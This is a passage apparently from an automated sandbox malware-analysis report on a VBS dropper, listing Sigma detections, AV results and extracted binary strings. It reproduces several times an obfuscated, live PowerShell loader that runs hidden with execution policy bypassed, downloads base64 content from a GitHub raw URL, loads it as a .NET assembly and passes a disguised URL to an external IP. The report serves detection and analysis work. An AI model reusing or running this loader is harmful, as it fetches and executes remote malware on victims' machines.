'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64Strin
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs", ProcessId: 6644, ProcessName: wscript.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64Strin
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs", ProcessId: 6644, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64Strin
Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnK

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for domain / URL
Source: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtVirustotal: Detection: 6%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000006.00000002.1391686254.00007FFAAC7A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ows\dll\System.pdbsv source: powershell.exe, 00000006.00000002.1382179143.000001776F323000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
